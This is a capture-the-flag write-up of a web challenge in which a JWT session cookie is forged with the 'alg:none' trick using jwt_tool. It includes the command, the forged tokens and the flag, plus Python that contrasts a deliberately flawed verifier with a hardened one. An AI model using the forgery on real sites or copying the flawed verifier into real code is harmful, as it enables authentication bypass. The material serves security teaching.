Category
Web
Description
I found a page that only the site admins can access. Can you break into it?
Solution
Opening the page we get an "Authentication required." message.
Checking the cookies we find a JWT in the cookie named session.
Decoding the payload of the JWT we see that it holds a user id value:
{
"user_id": -1
}
Let's try using jwt_tool to change the alg to None and the user_id to 0 and see if we can get access.
jwt_tool eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjotMX0.KYcUKjfqhf6wTJo15Bj445WkN5Y7Fr_12Vk2q-ce87c -pc user_id -pv 0 -X a -I
jwttool_773c47463a838e39a1698e144ca13a3f - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyX2lkIjowfQ.
jwttool_077eddfda5fa95fc3970229ceb08c087 - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJOb25lIn0.eyJ1c2VyX2lkIjowfQ.
jwttool_b94e04df39b3c3e6314e4b01498ba1e2 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0.eyJ1c2VyX2lkIjowfQ.
jwttool_6198faea114a254b28c95305d2aed744 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJ0eXAiOiJKV1QiLCJhbGciOiJuT25FIn0.eyJ1c2VyX2lkIjowfQ.
Using the new token grants us access and we get the flag.

ASV{n0_s1gn@tur3_r3qu1r3d}
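As an added illustration (not part of the original writeup, and not the challenge's code), the script below decodes the two tokens from this solution and contrasts the verifier pattern that made the attack work (trusting the alg value in the token's own header, so any spelling of "none" skips the signature) with a hardened verifier that pins HS256 server-side and compares the HMAC in constant time. The signing key DEMO_KEY is a constructed value; the challenge's real key is unknown, so the original session token is only decoded here, never verified.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Tokens copied from the writeup: the original session cookie and the
# "alg":"none" variant that jwt_tool produced from it.
ORIGINAL_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
                  "eyJ1c2VyX2lkIjotMX0."
                  "KYcUKjfqhf6wTJo15Bj445WkN5Y7Fr_12Vk2q-ce87c")
FORGED_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyX2lkIjowfQ."

# Constructed demo key; the challenge's real signing key is not known.
DEMO_KEY = b"demo-signing-key-not-the-real-one"


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Split a token into (header, payload) for inspection only; no signature check."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint a proper HS256 token (used here only to have a valid token to test with)."""
    header = json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":"))
    header_b64 = b64url_encode(header.encode())
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"


def verify_trusting_header(token: str, key: bytes) -> Optional[dict]:
    """The flawed pattern behind the challenge: the verifier lets the token's own
    header choose the algorithm, so a header saying "none" (in any casing, which is
    why jwt_tool emits four spellings) skips the signature check entirely."""
    header, payload = decode_unverified(token)
    alg = str(header.get("alg", "")).lower()
    if alg == "none":          # BUG: unsigned tokens are accepted as-is
        return payload
    if alg == "hs256":
        return verify_hs256(token, key)
    return None


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Hardened verifier: the algorithm is pinned by the server, not read from the
    token, and the HMAC is compared in constant time. Returns None on any failure."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError:         # wrong segment count, bad base64, or bad JSON
        return None
    if header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(sig_b64), expected):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    print("original token:", decode_unverified(ORIGINAL_TOKEN))
    print("forged token:  ", decode_unverified(FORGED_TOKEN))
    print("flawed verifier on forged token:  ", verify_trusting_header(FORGED_TOKEN, DEMO_KEY))
    print("hardened verifier on forged token:", verify_hs256(FORGED_TOKEN, DEMO_KEY))
```

The defensive takeaway is the single comparison `header.get("alg") != "HS256"`: the server decides which algorithm is acceptable and never lets the token negotiate it, which closes every "none" spelling at once. Real JWT libraries expose the same control as an allow-list of algorithms passed to the decode call; a token arriving with an empty third segment is also an easy thing to alert on at the edge.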